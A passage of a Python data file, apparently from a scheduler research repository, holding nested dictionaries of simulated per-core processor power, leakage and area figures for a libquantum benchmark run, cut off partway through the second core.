"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_libquantum/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.153579,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.265942,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.152525,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.572046,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.151806,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.15783,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00556734,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0402589,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0411739,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0402589,
'Execution Unit/Register Files/Runtime Dynamic': 0.0467412,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.097282,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.274895,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 1.50175,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00132945,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00132945,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00116592,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000455709,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000591466,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0044163,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0124618,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0395815,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.51772,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.179527,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.134437,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.8603,
'Instruction Fetch Unit/Runtime Dynamic': 0.370423,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0642931,
'L2/Runtime Dynamic': 0.0193234,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.91435,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.356003,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.02191,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0219099,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.01823,
'Load Store Unit/Runtime Dynamic': 0.485965,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0540262,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.108052,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0191741,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0201394,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.156543,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0294315,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.348189,
'Memory Management Unit/Runtime Dynamic': 0.0495709,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 17.0105,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.00785316,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.080835,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.0886882,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 2.51572,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0546638,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0881707,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0445056,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.18734,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0625195,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 3.94504,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00229285,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0165802,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.016957,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0165802,
'Execution Unit/Register Files/Runtime Dynamic': 0.0192499,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0349298,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.0977856,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.912441,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000557349,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000557349,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000490241,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000192401,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000243589,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00184853,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00517265,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0163012,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.0369,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0735861,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0553662,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.30573,
'Instruction Fetch Unit/Runtime Dynamic': 0.152275,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0264796,
'L2/Runtime Dynamic': 0.00805188,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.51207,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.144867,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.00889525,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.00889527,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 1.55407,
'Load Store Unit/Runtime Dynamic': 0.197631,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0219342,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.0438684,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0077845,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.00818205,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0644703,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0120637,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.233952,
'Memory Management Unit/Runtime Dynamic': 0.0202458,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 12.6547,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00246628,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
